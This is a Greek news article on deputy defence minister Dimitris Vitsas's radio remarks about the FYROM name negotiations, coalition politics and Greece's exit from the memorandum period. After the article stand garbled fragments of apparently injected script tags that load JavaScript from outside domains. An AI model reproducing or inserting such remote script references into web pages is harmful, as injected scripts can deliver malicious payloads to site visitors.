Βίτσας για Σκοπιανό: Πηγαίνουμε σε μία λύση που αποκλείει αλυτρωτισμούς στα Βαλκάνια

Βίτσας για Σκοπιανό: Πηγαίνουμε σε μία λύση που αποκλείει αλυτρωτισμούς στα Βαλκάνια

«Θα δούμε ποια λύση προκρίνεται και αν συμφωνούμε, θα προχωρήσουμε»

Πηγαίνουμε σε μία λύση πακέτο που αποκλείει αλυτρωτισμούς στα Βαλκάνια, επιδιώκοντας τη μεγαλύτερη δυνατή συναίνεση και λαμβάνοντας υπόψιν τις θέσεις των άλλων πολιτικών δυνάμεων, αλλά και διαφόρων άλλων κοινωνικών θεσμών, επισήμανε ο αναπληρωτής υπουργός Εθνικής Άμυνας, Δημήτρης Βίτσας, σε συνέντευξή του στον ραδιοφωνικό σταθμό Real fm, αναφερόμενος στην διαπραγμάτευση με την ΠΓΔΜ.

«Αυτό σημαίνει και ενημέρωση» πρόσθεσε. Παρατήρησε δε, ότι «υπάρχουν αλυτρωτικά και προς τα Σκόπια, για παράδειγμα και από την Αλβανία».

«Μέσα από αυτή τη διαδικασία της διαπραγμάτευσης και αφού θα δούμε και ποια λύση προκρίνεται και αν συμφωνούμε, θα προχωρήσουμε» διευκρίνισε σύμφωνα με το Αθηναϊκό Πρακτορείο Ειδήσεων.

Υπενθύμισε δε, ότι «οι Ανεξάρτητοι Έλληνες και ο ίδιος ο Πάνος Καμμένος έχει δηλώσει την πλήρη εμπιστοσύνη του στον υπουργό Εξωτερικών και την μεγαλύτερη ακόμα εμπιστοσύνη του στον πρωθυπουργό».

Αναφερόμενος στους στόχους της κυβέρνησης την επόμενη περίοδο, ο κ. Βίτσας επισήμανε ότι «στόχος μας είναι να φύγει η χώρα από τη μνημονιακή περίοδο και να δημιουργήσει μια βάση με την οποία θα μπορούμε μόνοι μας, βεβαίως με τις αντίστοιχες δεσμεύσεις από τη συμμετοχή μας στην ΕΕ, και να αποφασίζουμε και να προχωράμε».

Παρατήρησε ακόμα, ότι «μετά τον Αύγουστο δεν θα είναι μια εύκολη περίοδος».

«Αν κάποιος περιμένει να φάμε με χρυσά κουτάλια, κάνει λάθος. Αν περιμένει, όμως, ότι θα αρχίσει να βελτιώνεται η κατάσταση, ξεκινώντας από τα πιο χαμηλά εισοδηματικά στρώματα, έχει δίκιο» ανέφερε χαρακτηριστικά.

«Εμείς κάνουμε πράγματα που θα φέρουν σε πολύ καλύτερη θέση και την κοινωνία και τη χώρα, χωρίς να ξεχνάμε μέσα από νίκες, ήττες και ισοπαλίες, ότι προσπαθούμε για κάτι ακόμα περισσότερο» κατέληξε.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>

Leave a Reply

Your email address will not be published. Required fields are marked *

*